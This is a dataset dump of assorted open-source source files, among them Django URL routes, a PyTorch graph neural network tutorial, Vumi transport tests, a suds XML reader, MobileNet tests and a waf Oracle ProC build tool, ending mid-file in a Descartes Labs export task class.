max_stars_repo_path
stringlengths
4
245
max_stars_repo_name
stringlengths
7
115
max_stars_count
int64
101
368k
id
stringlengths
2
8
content
stringlengths
6
1.03M
corehq/apps/userreports/urls.py
dimagilg/commcare-hq
471
12634321
<reponame>dimagilg/commcare-hq from django.conf.urls import include, url from corehq.apps.userreports.reports.view import ( DownloadUCRStatusView, ucr_download_job_poll, ) from corehq.apps.userreports.views import ( CreateConfigReportView, CreateDataSourceFromAppView, CreateDataSourceView, DataSourceDebuggerView, DataSourceSummaryView, EditConfigReportView, EditDataSourceView, ExpressionDebuggerView, ImportConfigReportView, PreviewDataSourceView, UserConfigReportsHomeView, build_data_source_in_place, copy_report, choice_list_api, data_source_json, delete_data_source, delete_report, evaluate_data_source, evaluate_expression, export_data_source, rebuild_data_source, report_source_json, resume_building_data_source, undelete_data_source, undelete_report, update_report_description, ) urlpatterns = [ url(r'^$', UserConfigReportsHomeView.as_view(), name=UserConfigReportsHomeView.urlname), url(r'^reports/create/$', CreateConfigReportView.as_view(), name=CreateConfigReportView.urlname), url(r'^reports/import/$', ImportConfigReportView.as_view(), name=ImportConfigReportView.urlname), url(r'^reports/edit/(?P<report_id>[\w-]+)/$', EditConfigReportView.as_view(), name=EditConfigReportView.urlname), url(r'^reports/source/(?P<report_id>[\w-]+)/$', report_source_json, name='configurable_report_json'), url(r'^reports/delete/(?P<report_id>[\w-]+)/$', delete_report, name='delete_configurable_report'), url(r'^reports/undelete/(?P<report_id>[\w-]+)/$', undelete_report, name='undo_delete_configurable_report'), url(r'^data_sources/create/$', CreateDataSourceView.as_view(), name=CreateDataSourceView.urlname), url(r'^data_sources/create_from_app/$', CreateDataSourceFromAppView.as_view(), name=CreateDataSourceFromAppView.urlname), url(r'^data_sources/edit/(?P<config_id>[\w-]+)/$', EditDataSourceView.as_view(), name=EditDataSourceView.urlname), url(r'^data_sources/source/(?P<config_id>[\w-]+)/$', data_source_json, name='configurable_data_source_json'), url(r'^data_sources/delete/(?P<config_id>[\w-]+)/$', delete_data_source, name='delete_configurable_data_source'), url(r'^data_sources/undelete/(?P<config_id>[\w-]+)/$', undelete_data_source, name='undo_delete_data_source'), url(r'^data_sources/rebuild/(?P<config_id>[\w-]+)/$', rebuild_data_source, name='rebuild_configurable_data_source'), url(r'^data_sources/resume/(?P<config_id>[\w-]+)/$', resume_building_data_source, name='resume_build'), url(r'^data_sources/build_in_place/(?P<config_id>[\w-]+)/$', build_data_source_in_place, name='build_in_place'), url(r'^data_sources/preview/(?P<config_id>[\w-]+)/$', PreviewDataSourceView.as_view(), name=PreviewDataSourceView.urlname), url(r'^data_sources/summary/(?P<config_id>[\w-]+)/$', DataSourceSummaryView.as_view(), name=DataSourceSummaryView.urlname), url(r'^data_sources/export/(?P<config_id>[\w-]+)/$', export_data_source, name='export_configurable_data_source'), url(r'^expression_debugger/$', ExpressionDebuggerView.as_view(), name='expression_debugger'), url(r'^data_source_debugger/$', DataSourceDebuggerView.as_view(), name='data_source_debugger'), url(r'^export_status/(?P<download_id>(?:dl-)?[0-9a-fA-Z]{25,32})/(?P<subreport_slug>[\w-]+)/$', DownloadUCRStatusView.as_view(), name=DownloadUCRStatusView.urlname), url(r'^export_job_poll/(?P<download_id>(?:dl-)?[0-9a-fA-Z]{25,32})/$', ucr_download_job_poll, name='ucr_download_job_poll'), # Update Report Description url(r'^builder/update_report_description/(?P<report_id>[\w-]+)', update_report_description, name='update_report_description'), # apis url(r'^api/choice_list/(?P<report_id>[\w-]+)/(?P<filter_id>[\w-]+)/$', choice_list_api, name='choice_list_api'), url(r'^expression_evaluator/$', evaluate_expression, name='expression_evaluator'), url(r'^data_source_evaluator/$', evaluate_data_source, name='data_source_evaluator'), url(r'^aggregate/', include('corehq.apps.aggregate_ucrs.urls')), url(r'^copy_report/$', copy_report, name='copy_report'), ]
sporco/cupy/pgm/__init__.py
vishalbelsare/sporco
217
12634355
<reponame>vishalbelsare/sporco # -*- coding: utf-8 -*- # Copyright (C) 2018-2020 by <NAME> <<EMAIL>> # All rights reserved. BSD 3-clause License. # This file is part of the SPORCO package. Details of the copyright # and user license can be found in the 'LICENSE.txt' file distributed # with the package. """Construct variant of pgm subpackage that use cupy instead of numpy.""" from __future__ import absolute_import import sys import re from sporco.cupy import sporco_cupy_patch_module from sporco.cupy import common from sporco.cupy import linalg from sporco.cupy import fft from sporco.cupy import prox from sporco.cupy import cnvrep # Construct sporco.cupy.pgm pgm = sporco_cupy_patch_module('sporco.pgm') # Construct cupy versions of sporco.pgm auxiliary modules pgm.backtrack = sporco_cupy_patch_module('sporco.pgm.backtrack') pgm.momentum = sporco_cupy_patch_module('sporco.pgm.momentum') pgm.stepsize = sporco_cupy_patch_module('sporco.pgm.stepsize') # Construct sporco.cupy.pgm.pgm pgm.pgm = sporco_cupy_patch_module( 'sporco.pgm.pgm', {'IterativeSolver': common.IterativeSolver, 'rfftn': fft.rfftn, 'irfftn': fft.irfftn, 'BacktrackStandard': pgm.backtrack.BacktrackStandard, 'BacktrackRobust': pgm.backtrack.BacktrackRobust, 'MomentumNesterov': pgm.momentum.MomentumNesterov, 'MomentumLinear': pgm.momentum.MomentumLinear, 'MomentumGenLinear': pgm.momentum.MomentumGenLinear, 'StepSizePolicyCauchy': pgm.stepsize.StepSizePolicyCauchy, 'StepSizePolicyBB': pgm.stepsize.StepSizePolicyBB}) # Record current entries in sys.modules and then replace them with # patched versions of the modules sysmod = {} for mod in ('sporco.common', 'sporco.pgm', 'sporco.pgm.pgm'): if mod in sys.modules: sysmod[mod] = sys.modules[mod] sys.modules['sporco.common'] = common sys.modules['sporco.pgm'] = pgm sys.modules['sporco.pgm.pgm'] = pgm.pgm # Construct sporco.cupy.pgm.cbpdn pgm.cbpdn = sporco_cupy_patch_module( 'sporco.pgm.cbpdn', {'pgm': pgm.pgm, 'inner': linalg.inner, 'CSC_ConvRepIndexing': cnvrep.CSC_ConvRepIndexing, 'mskWshape': cnvrep.mskWshape, 'rfftn': fft.rfftn, 'irfftn': fft.irfftn, 'empty_aligned': fft.empty_aligned, 'rfftn_empty_aligned': fft.rfftn_empty_aligned, 'rfl2norm2': fft.rfl2norm2, 'prox_l1': prox.prox_l1}) # Restore original entries in sys.modules for mod in ('sporco.common', 'sporco.pgm', 'sporco.pgm.pgm'): if mod in sysmod: sys.modules[mod] = sysmod[mod] else: del sys.modules[mod] # In sporco.cupy.pgm module, replace original module source path with # corresponding path in 'sporco/cupy' directory tree for n, pth in enumerate(sys.modules['sporco.cupy.pgm'].__path__): pth = re.sub('sporco/', 'sporco/cupy/', pth) sys.modules['sporco.cupy.pgm'].__path__[n] = pth
tools/please_pex/pex_import_test.py
samwestmoreland/please
1,992
12634379
# Test for importing certain modules with the new incremental pex # rules. These have proven tricky, seemingly around requests doing # "from . import utils" etc (which is perfectly fine, and was working # previously, this just helps investigate & make sure it's fixed). import unittest class PexImportTest(unittest.TestCase): def test_import_requests(self): """Test importing Requests.""" from third_party.python import requests def test_import_dateutil(self): """Test importing dateutil.""" from third_party.python.dateutil import parser if __name__ == '__main__': unittest.main()
ch18/ch18_part1.py
ericgarza70/machine-learning-book
655
12634414
# coding: utf-8 import sys from python_environment_check import check_packages import networkx as nx import numpy as np import torch from torch.nn.parameter import Parameter import torch.nn.functional as F from torch.utils.data import Dataset from torch.utils.data import DataLoader # # Machine Learning with PyTorch and Scikit-Learn # # -- Code Examples # ## Package version checks # Add folder to path in order to load from the check_packages.py script: sys.path.insert(0, '..') # Check recommended package versions: d = { 'torch': '1.8.0', 'networkx': '2.6.2', 'numpy': '1.21.2', } check_packages(d) # # Chapter 18 - Graph Neural Networks for Capturing Dependencies in Graph Structured Data (Part 1/2) # - [Introduction to graph data](#Introduction-to-graph-data) # - [Undirected graphs](#Undirected-graphs) # - [Directed graphs](#Directed-graphs) # - [Labeled graphs](#Labeled-graphs) # - [Representing molecules as graphs](#Representing-molecules-as-graphs) # - [Understanding graph convolutions](#Understanding-graph-convolutions) # - [The motivation behind using graph convolutions](#The-motivation-behind-using-graph-convolutions) # - [Implementing a basic graph convolution](#Implementing-a-basic-graph-convolution) # - [Implementing a GNN in PyTorch from scratch](#Implementing-a-GNN-in-PyTorch-from-scratch) # - [Defining the NodeNetwork model](#Defining-the-NodeNetwork-model) # - [Coding the NodeNetwork’s graph convolution layer](#Coding-the-NodeNetworks-graph-convolution-layer) # - [Adding a global pooling layer to deal with varying graph sizes](#Adding-a-global-pooling-layer-to-deal-with-varying-graph-sizes) # - [Preparing the DataLoader](#Preparing-the-DataLoader) # - [Using the NodeNetwork to make predictions](#Using-the-NodeNetwork-to-make-predictions) # ## Introduction to graph data # ### Undirected graphs # ### Directed graphs # ### Labeled graphs # ### Representing molecules as graphs # ### Understanding graph convolutions # ### The motivation behind using graph convolutions # ### Implementing a basic graph convolution G = nx.Graph() #Hex codes for colors if we draw graph blue, orange, green = "#1f77b4", "#ff7f0e","#2ca02c" G.add_nodes_from([(1, {"color": blue}), (2, {"color": orange}), (3, {"color": blue}), (4, {"color": green})]) G.add_edges_from([(1, 2),(2, 3),(1, 3),(3, 4)]) A = np.asarray(nx.adjacency_matrix(G).todense()) print(A) def build_graph_color_label_representation(G,mapping_dict): one_hot_idxs = np.array([mapping_dict[v] for v in nx.get_node_attributes(G, 'color').values()]) one_hot_encoding = np.zeros((one_hot_idxs.size,len(mapping_dict))) one_hot_encoding[np.arange(one_hot_idxs.size),one_hot_idxs] = 1 return one_hot_encoding X = build_graph_color_label_representation(G, {green: 0, blue: 1, orange: 2}) print(X) color_map = nx.get_node_attributes(G, 'color').values() nx.draw(G, with_labels=True, node_color=color_map) f_in, f_out = X.shape[1], 6 W_1 = np.random.rand(f_in, f_out) W_2 = np.random.rand(f_in, f_out) h = np.dot(X,W_1) + np.dot(np.dot(A, X), W_2) # ## Implementing a GNN in PyTorch from scratch # ### Defining the NodeNetwork model class NodeNetwork(torch.nn.Module): def __init__(self, input_features): super().__init__() self.conv_1 = BasicGraphConvolutionLayer(input_features, 32) self.conv_2 = BasicGraphConvolutionLayer(32, 32) self.fc_1 = torch.nn.Linear(32, 16) self.out_layer = torch.nn.Linear(16, 2) def forward(self, X, A,batch_mat): x = self.conv_1(X, A).clamp(0) x = self.conv_2(x, A).clamp(0) output = global_sum_pool(x, batch_mat) output = self.fc_1(output) output = self.out_layer(output) return F.softmax(output, dim=1) # ### Coding the NodeNetwork’s graph convolution layer class BasicGraphConvolutionLayer(torch.nn.Module): def __init__(self, in_channels, out_channels): super().__init__() self.in_channels = in_channels self.out_channels = out_channels self.W2 = Parameter(torch.rand( (in_channels, out_channels), dtype=torch.float32)) self.W1 = Parameter(torch.rand( (in_channels, out_channels), dtype=torch.float32)) self.bias = Parameter(torch.zeros( out_channels, dtype=torch.float32)) def forward(self, X, A): potential_msgs = torch.mm(X, self.W2) propagated_msgs = torch.mm(A, potential_msgs) root_update = torch.mm(X, self.W1) output = propagated_msgs + root_update + self.bias return output # ### Adding a global pooling layer to deal with varying graph sizes def global_sum_pool(X, batch_mat): if batch_mat is None or batch_mat.dim() == 1: return torch.sum(X, dim=0).unsqueeze(0) else: return torch.mm(batch_mat, X) def get_batch_tensor(graph_sizes): starts = [sum(graph_sizes[:idx]) for idx in range(len(graph_sizes))] stops = [starts[idx]+graph_sizes[idx] for idx in range(len(graph_sizes))] tot_len = sum(graph_sizes) batch_size = len(graph_sizes) batch_mat = torch.zeros([batch_size, tot_len]).float() for idx, starts_and_stops in enumerate(zip(starts, stops)): start = starts_and_stops[0] stop = starts_and_stops[1] batch_mat[idx, start:stop] = 1 return batch_mat def collate_graphs(batch): adj_mats = [graph['A'] for graph in batch] sizes = [A.size(0) for A in adj_mats] tot_size = sum(sizes) # create batch matrix batch_mat = get_batch_tensor(sizes) # combine feature matrices feat_mats = torch.cat([graph['X'] for graph in batch],dim=0) # combine labels labels = torch.cat([graph['y'] for graph in batch], dim=0) # combine adjacency matrices batch_adj = torch.zeros([tot_size, tot_size], dtype=torch.float32) accum = 0 for adj in adj_mats: g_size = adj.shape[0] batch_adj[accum:accum+g_size, accum:accum+g_size] = adj accum = accum + g_size repr_and_label = { 'A': batch_adj, 'X': feat_mats, 'y': labels, 'batch' : batch_mat} return repr_and_label # ### Preparing the DataLoader def get_graph_dict(G, mapping_dict): # build dictionary representation of graph G A = torch.from_numpy(np.asarray(nx.adjacency_matrix(G).todense())).float() # build_graph_color_label_representation() was introduced with the first example graph X = torch.from_numpy(build_graph_color_label_representation(G,mapping_dict)).float() # kludge since there is not specific task for this example y = torch.tensor([[1, 0]]).float() return {'A': A, 'X': X, 'y': y, 'batch': None} # building 4 graphs to treat as a dataset blue, orange, green = "#1f77b4", "#ff7f0e","#2ca02c" mapping_dict = {green: 0, blue: 1, orange: 2} G1 = nx.Graph() G1.add_nodes_from([(1, {"color": blue}), (2, {"color": orange}), (3, {"color": blue}), (4, {"color": green})]) G1.add_edges_from([(1, 2), (2, 3),(1, 3), (3, 4)]) G2 = nx.Graph() G2.add_nodes_from([(1, {"color": green}), (2, {"color": green}), (3, {"color": orange}), (4, {"color": orange}), (5,{"color": blue})]) G2.add_edges_from([(2, 3),(3, 4),(3, 1),(5, 1)]) G3 = nx.Graph() G3.add_nodes_from([(1, {"color": orange}), (2, {"color": orange}), (3, {"color": green}), (4, {"color": green}), (5, {"color": blue}), (6, {"color":orange})]) G3.add_edges_from([(2, 3), (3, 4), (3, 1), (5, 1), (2, 5), (6, 1)]) G4 = nx.Graph() G4.add_nodes_from([(1, {"color": blue}), (2, {"color": blue}), (3, {"color": green})]) G4.add_edges_from([(1, 2), (2, 3)]) graph_list = [get_graph_dict(graph,mapping_dict) for graph in [G1, G2, G3, G4]] class ExampleDataset(Dataset): # Simple PyTorch dataset that will use our list of graphs def __init__(self, graph_list): self.graphs = graph_list def __len__(self): return len(self.graphs) def __getitem__(self,idx): mol_rep = self.graphs[idx] return mol_rep dset = ExampleDataset(graph_list) # Note how we use our custom collate function loader = DataLoader(dset, batch_size=2, shuffle=False, collate_fn=collate_graphs) # ### Using the NodeNetwork to make predictions torch.manual_seed(123) node_features = 3 net = NodeNetwork(node_features) batch_results = [] for b in loader: batch_results.append(net(b['X'], b['A'], b['batch']).detach()) G1_rep = dset[1] G1_single = net(G1_rep['X'], G1_rep['A'], G1_rep['batch']).detach() G1_batch = batch_results[0][1] torch.all(torch.isclose(G1_single, G1_batch)) # --- # # Readers may ignore the next cell.
voctocore/lib/errors/configuration_error.py
0xflotus/voctomix
521
12634422
<filename>voctocore/lib/errors/configuration_error.py class ConfigurationError(RuntimeError): """Problem in the Configuration"""
vumi/transports/tests/test_base.py
seidu626/vumi
199
12634425
<filename>vumi/transports/tests/test_base.py from twisted.internet.defer import inlineCallbacks from vumi.tests.helpers import VumiTestCase from vumi.transports.base import Transport from vumi.transports.tests.helpers import TransportHelper from vumi.tests.utils import LogCatcher class TestBaseTransport(VumiTestCase): TEST_MIDDLEWARE_CONFIG = { "middleware": [ {"mw1": "vumi.middleware.tests.utils.RecordingMiddleware"}, {"mw2": "vumi.middleware.tests.utils.RecordingMiddleware"}, ], } def setUp(self): self.tx_helper = self.add_helper(TransportHelper(Transport)) @inlineCallbacks def test_start_transport(self): tr = yield self.tx_helper.get_transport({}) self.assertEqual(self.tx_helper.transport_name, tr.transport_name) self.assertTrue(len(tr.connectors) >= 1) connector = tr.connectors[tr.transport_name] self.assertTrue(connector._consumers.keys(), set(['outbound'])) self.assertTrue(connector._publishers.keys(), set(['inbound', 'event'])) self.assertEqual(tr.failure_publisher.routing_key, '%s.failures' % (tr.transport_name,)) @inlineCallbacks def test_middleware_for_inbound_messages(self): transport = yield self.tx_helper.get_transport( self.TEST_MIDDLEWARE_CONFIG) orig_msg = self.tx_helper.make_inbound("inbound") yield transport.publish_message(**orig_msg.payload) [msg] = self.tx_helper.get_dispatched_inbound() self.assertEqual(msg['record'], [ ['mw2', 'inbound', self.tx_helper.transport_name], ['mw1', 'inbound', self.tx_helper.transport_name], ]) @inlineCallbacks def test_middleware_for_events(self): transport = yield self.tx_helper.get_transport( self.TEST_MIDDLEWARE_CONFIG) orig_msg = self.tx_helper.make_ack() yield transport.publish_event(**orig_msg.payload) [msg] = self.tx_helper.get_dispatched_events() self.assertEqual(msg['record'], [ ['mw2', 'event', self.tx_helper.transport_name], ['mw1', 'event', self.tx_helper.transport_name], ]) @inlineCallbacks def test_middleware_for_failures(self): transport = yield self.tx_helper.get_transport( self.TEST_MIDDLEWARE_CONFIG) orig_msg = self.tx_helper.make_outbound("outbound") yield transport.send_failure(orig_msg, ValueError(), "dummy_traceback") [msg] = self.tx_helper.get_dispatched_failures() self.assertEqual(msg['record'], [ ['mw2', 'failure', self.tx_helper.transport_name], ['mw1', 'failure', self.tx_helper.transport_name], ]) @inlineCallbacks def test_middleware_for_outbound_messages(self): msgs = [] transport = yield self.tx_helper.get_transport( self.TEST_MIDDLEWARE_CONFIG) transport.add_outbound_handler(msgs.append) yield self.tx_helper.make_dispatch_outbound("outbound") [msg] = msgs self.assertEqual(msg['record'], [ ('mw1', 'outbound', self.tx_helper.transport_name), ('mw2', 'outbound', self.tx_helper.transport_name), ]) def get_tx_consumers(self, tx): for connector in tx.connectors.values(): for consumer in connector._consumers.values(): yield consumer @inlineCallbacks def test_transport_prefetch_count_custom(self): transport = yield self.tx_helper.get_transport({ 'amqp_prefetch_count': 1, }) consumers = list(self.get_tx_consumers(transport)) self.assertEqual(1, len(consumers)) for consumer in consumers: fake_channel = consumer.channel._fake_channel self.assertEqual(fake_channel.qos_prefetch_count, 1) @inlineCallbacks def test_transport_prefetch_count_default(self): transport = yield self.tx_helper.get_transport({}) consumers = list(self.get_tx_consumers(transport)) self.assertEqual(1, len(consumers)) for consumer in consumers: fake_channel = consumer.channel._fake_channel self.assertEqual(fake_channel.qos_prefetch_count, 20) @inlineCallbacks def test_add_outbound_handler(self): transport = yield self.tx_helper.get_transport({}) msgs = [] msg = transport.add_outbound_handler(msgs.append, endpoint_name='foo') msg = yield self.tx_helper.make_dispatch_outbound( "outbound", endpoint='foo') self.assertEqual(msgs, [msg]) @inlineCallbacks def test_publish_status(self): transport = yield self.tx_helper.get_transport({ 'transport_name': 'foo', 'publish_status': True }) msg = yield transport.publish_status( status='down', component='foo', type='bar', message='baz') self.assertEqual(msg['status'], 'down') self.assertEqual(msg['component'], 'foo') self.assertEqual(msg['type'], 'bar') self.assertEqual(msg['message'], 'baz') msgs = self.tx_helper.get_dispatched_statuses('foo.status') self.assertEqual(msgs, [msg]) @inlineCallbacks def test_publish_status_disabled(self): transport = yield self.tx_helper.get_transport({ 'transport_name': 'foo', 'worker_name': 'foo', 'publish_status': False }) with LogCatcher() as lc: msg = yield transport.publish_status( status='down', component='foo', type='bar', message='baz') self.assertEqual(msg['status'], 'down') self.assertEqual(msg['component'], 'foo') self.assertEqual(msg['type'], 'bar') self.assertEqual(msg['message'], 'baz') msgs = self.tx_helper.get_dispatched_statuses('foo.status') self.assertEqual(msgs, []) [log] = lc.logs self.assertEqual( log['message'][0], "Status publishing disabled for transport 'foo', " "ignoring status %r" % (msg,)) self.assertEqual(log['system'], 'foo')
suds/reader.py
Ndn1618/interactive-tutorials
2,750
12634462
# This program is free software; you can redistribute it and/or modify # it under the terms of the (LGPL) GNU Lesser General Public License as # published by the Free Software Foundation; either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Library Lesser General Public License for more details at # ( http://www.gnu.org/licenses/lgpl.html ). # # You should have received a copy of the GNU Lesser General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. # written by: <NAME> ( <EMAIL> ) """ Contains xml document reader classes. """ import hashlib from logging import getLogger from suds.sax.parser import Parser from suds.transport import Request from suds.cache import NoCache from suds.store import DocumentStore from suds.plugin import PluginContainer log = getLogger(__name__) class Reader: """ The reader provides integration with cache. @ivar options: An options object. @type options: I{Options} """ def __init__(self, options): """ @param options: An options object. @type options: I{Options} """ self.options = options self.plugins = PluginContainer(options.plugins) def mangle(self, name, x): """ Mangle the name by hashing the I{name} and appending I{x}. @return: the mangled name. """ h = hashlib.sha256(name.encode('utf8')).hexdigest() return '%s-%s' % (h, x) class DocumentReader(Reader): """ The XML document reader provides an integration between the SAX L{Parser} and the document cache. """ def open(self, url): """ Open an XML document at the specified I{url}. First, the document attempted to be retrieved from the I{object cache}. If not found, it is downloaded and parsed using the SAX parser. The result is added to the cache for the next open(). @param url: A document url. @type url: str. @return: The specified XML document. @rtype: I{Document} """ cache = self.cache() id = self.mangle(url, 'document') d = cache.get(id) if d is None: d = self.download(url) cache.put(id, d) self.plugins.document.parsed(url=url, document=d.root()) return d def download(self, url): """ Download the docuemnt. @param url: A document url. @type url: str. @return: A file pointer to the docuemnt. @rtype: file-like """ store = DocumentStore() fp = store.open(url) if fp is None: fp = self.options.transport.open(Request(url)) content = fp.read() fp.close() ctx = self.plugins.document.loaded(url=url, document=content) content = ctx.document sax = Parser() return sax.parse(string=content) def cache(self): """ Get the cache. @return: The I{options} when I{cachingpolicy} = B{0}. @rtype: L{Cache} """ if self.options.cachingpolicy == 0: return self.options.cache else: return NoCache() class DefinitionsReader(Reader): """ The WSDL definitions reader provides an integration between the Definitions and the object cache. @ivar fn: A factory function (constructor) used to create the object not found in the cache. @type fn: I{Constructor} """ def __init__(self, options, fn): """ @param options: An options object. @type options: I{Options} @param fn: A factory function (constructor) used to create the object not found in the cache. @type fn: I{Constructor} """ Reader.__init__(self, options) self.fn = fn def open(self, url): """ Open a WSDL at the specified I{url}. First, the WSDL attempted to be retrieved from the I{object cache}. After unpickled from the cache, the I{options} attribute is restored. If not found, it is downloaded and instantiated using the I{fn} constructor and added to the cache for the next open(). @param url: A WSDL url. @type url: str. @return: The WSDL object. @rtype: I{Definitions} """ cache = self.cache() id = self.mangle(url, 'wsdl') d = cache.get(id) if d is None: d = self.fn(url, self.options) cache.put(id, d) else: d.options = self.options for imp in d.imports: imp.imported.options = self.options return d def cache(self): """ Get the cache. @return: The I{options} when I{cachingpolicy} = B{1}. @rtype: L{Cache} """ if self.options.cachingpolicy == 1: return self.options.cache else: return NoCache()
tools/nets/mobilenet_test.py
wqdun/MobileNet
1,698
12634473
# Copyright 2016 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Tests for MobileNet.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import tensorflow as tf from nets import mobilenet slim = tf.contrib.slim class MobileNetTest(tf.test.TestCase): def testBuild(self): batch_size = 5 height, width = 224, 224 num_classes = 1000 with self.test_session(): inputs = tf.random_uniform((batch_size, height, width, 3)) logits, end_points = mobilenet.mobilenet(inputs, num_classes) self.assertEquals(end_points['MobileNet/conv_ds_2/depthwise_conv'].get_shape().as_list(), [5, 112, 112, 32]) self.assertEquals(end_points['MobileNet/conv_ds_3/depthwise_conv'].get_shape().as_list(), [5, 56, 56, 64]) self.assertEquals(end_points['MobileNet/conv_ds_4/depthwise_conv'].get_shape().as_list(), [5, 56, 56, 128]) self.assertEquals(end_points['MobileNet/conv_ds_5/depthwise_conv'].get_shape().as_list(), [5, 28, 28, 128]) self.assertEquals(end_points['MobileNet/conv_ds_6/depthwise_conv'].get_shape().as_list(), [5, 28, 28, 256]) self.assertEquals(end_points['MobileNet/conv_ds_7/depthwise_conv'].get_shape().as_list(), [5, 14, 14, 256]) self.assertEquals(end_points['MobileNet/conv_ds_8/depthwise_conv'].get_shape().as_list(), [5, 14, 14, 512]) self.assertEquals(end_points['MobileNet/conv_ds_9/depthwise_conv'].get_shape().as_list(), [5, 14, 14, 512]) self.assertEquals(end_points['MobileNet/conv_ds_10/depthwise_conv'].get_shape().as_list(), [5, 14, 14, 512]) self.assertEquals(end_points['MobileNet/conv_ds_11/depthwise_conv'].get_shape().as_list(), [5, 14, 14, 512]) self.assertEquals(end_points['MobileNet/conv_ds_12/depthwise_conv'].get_shape().as_list(), [5, 14, 14, 512]) self.assertEquals(end_points['MobileNet/conv_ds_13/depthwise_conv'].get_shape().as_list(), [5, 7, 7, 512]) self.assertEquals(end_points['MobileNet/conv_ds_14/depthwise_conv'].get_shape().as_list(), [5, 7, 7, 1024]) self.assertEquals(end_points['squeeze'].get_shape().as_list(), [5, 1024]) self.assertEquals(logits.op.name, 'MobileNet/fc_16/BiasAdd') self.assertListEqual(logits.get_shape().as_list(), [batch_size, num_classes]) def testEvaluation(self): batch_size = 2 height, width = 224, 224 num_classes = 1000 with self.test_session(): eval_inputs = tf.random_uniform((batch_size, height, width, 3)) logits, _ = mobilenet.mobilenet(eval_inputs, is_training=False) self.assertListEqual(logits.get_shape().as_list(), [batch_size, num_classes]) predictions = tf.argmax(logits, 1) self.assertListEqual(predictions.get_shape().as_list(), [batch_size]) def testForward(self): batch_size = 1 height, width = 224, 224 with self.test_session() as sess: inputs = tf.random_uniform((batch_size, height, width, 3)) logits, _ = mobilenet.mobilenet(inputs) sess.run(tf.global_variables_initializer()) output = sess.run(logits) self.assertTrue(output.any()) if __name__ == '__main__': tf.test.main()
lib-src/lv2/suil/waflib/extras/proc.py
joshrose/audacity
7,892
12634580
#! /usr/bin/env python # per rosengren 2011 from os import environ, path from waflib import TaskGen, Utils def options(opt): grp = opt.add_option_group('Oracle ProC Options') grp.add_option('--oracle_home', action='store', default=environ.get('PROC_ORACLE'), help='Path to Oracle installation home (has bin/lib)') grp.add_option('--tns_admin', action='store', default=environ.get('TNS_ADMIN'), help='Directory containing server list (TNS_NAMES.ORA)') grp.add_option('--connection', action='store', default='dummy-user/dummy-password@dummy-server', help='Format: user/password@server') def configure(cnf): env = cnf.env if not env.PROC_ORACLE: env.PROC_ORACLE = cnf.options.oracle_home if not env.PROC_TNS_ADMIN: env.PROC_TNS_ADMIN = cnf.options.tns_admin if not env.PROC_CONNECTION: env.PROC_CONNECTION = cnf.options.connection cnf.find_program('proc', var='PROC', path_list=env.PROC_ORACLE + path.sep + 'bin') def proc(tsk): env = tsk.env gen = tsk.generator inc_nodes = gen.to_incnodes(Utils.to_list(getattr(gen,'includes',[])) + env['INCLUDES']) cmd = ( [env.PROC] + ['SQLCHECK=SEMANTICS'] + (['SYS_INCLUDE=(' + ','.join(env.PROC_INCLUDES) + ')'] if env.PROC_INCLUDES else []) + ['INCLUDE=(' + ','.join( [i.bldpath() for i in inc_nodes] ) + ')'] + ['userid=' + env.PROC_CONNECTION] + ['INAME=' + tsk.inputs[0].bldpath()] + ['ONAME=' + tsk.outputs[0].bldpath()] ) exec_env = { 'ORACLE_HOME': env.PROC_ORACLE, 'LD_LIBRARY_PATH': env.PROC_ORACLE + path.sep + 'lib', } if env.PROC_TNS_ADMIN: exec_env['TNS_ADMIN'] = env.PROC_TNS_ADMIN return tsk.exec_command(cmd, env=exec_env) TaskGen.declare_chain( name = 'proc', rule = proc, ext_in = '.pc', ext_out = '.c', )
descarteslabs/common/tasks/exporttask.py
carderne/descarteslabs-python
167
12634608
import time from descarteslabs.client.exceptions import NotFoundError from descarteslabs.client.services.storage import Storage from descarteslabs.common.tasks import FutureTask, TransientResultError, TimeoutError class ExportTask(FutureTask): """ An export task. Accessing any attributes before the task is completed (for example :attr:`status`) will block until the task completes. If you want to check whether the attributes are available, use :attr:`is_ready` which will return :const:`True` when attributes are available. Do not create an :class:`ExportTask` yourself; it is returned by :meth:`FeatureCollection.export <descarteslabs.vectors.featurecollection.FeatureCollection.export>` and :meth:`FeatureCollection.list_exports <descarteslabs.vectors.featurecollection.FeatureCollection.list_exports>`. """ def __init__(self, guid, tuid=None, client=None, result_attrs=None, key=None): if client is None: from descarteslabs.client.services.vector import Vector # circular import client = Vector() super(ExportTask, self).__init__(guid, tuid, client=client) self.export_id = tuid self._task_result = result_attrs self._set_key(key) def _set_key(self, key): if key is not None: self.key = key elif self._task_result is not None: labels = self._result_attribute("labels") if labels is not None: self.key = labels[3] def get_file(self, file_obj): """Download the exported Storage object to a local file. :param str file_obj: A file-like object or name of file to download into. :raises TransientResultError: If the export hasn't completed yet. """ if self.key is None: raise TransientResultError() else: return Storage().get_file(self.key, file_obj) def get_result(self, wait=False, timeout=None): """ Attempt to load the result for this export task. After returning from this method without an exception raised, the information for the task is available through the various properties. :param bool wait: Whether to wait for the task to complete or raise a :exc:`~descarteslabs.common.tasks.futuretask.TransientResultError` if the task hasn't completed yet. :param int timeout: How long to wait in seconds for the task to complete, or :const:`None` to wait indefinitely. :raises TransientResultError: When the result is not ready yet (and not waiting). :raises ~descarteslabs.common.tasks.TimeoutError: When the timeout has been reached (if waiting and set). """ # We have to go through the vector service since we don't # own the task group if self._task_result is None: start = time.time() while timeout is None or (time.time() - start) < timeout: try: result = self.client.get_export_result(self.guid, self.tuid) self._task_result = result.data.attributes self._set_key(None) except NotFoundError: if not wait: raise TransientResultError() else: break time.sleep(self.COMPLETION_POLL_INTERVAL_SECONDS) else: raise TimeoutError() @property def result(self): """ Export tasks don't have a result. :raises AttributeError: No result available """ raise AttributeError("Export tasks don't have a result") def __repr__(self): s = "ExportTask\n" if self.ready: s += "\tStatus: {}\n".format(self._task_result.status) s += "\tMemory usage (MiB): {:.2f}\n".format( self._task_result.peak_memory_usage / (1024 * 1024.0) ) s += "\tRuntime (s): 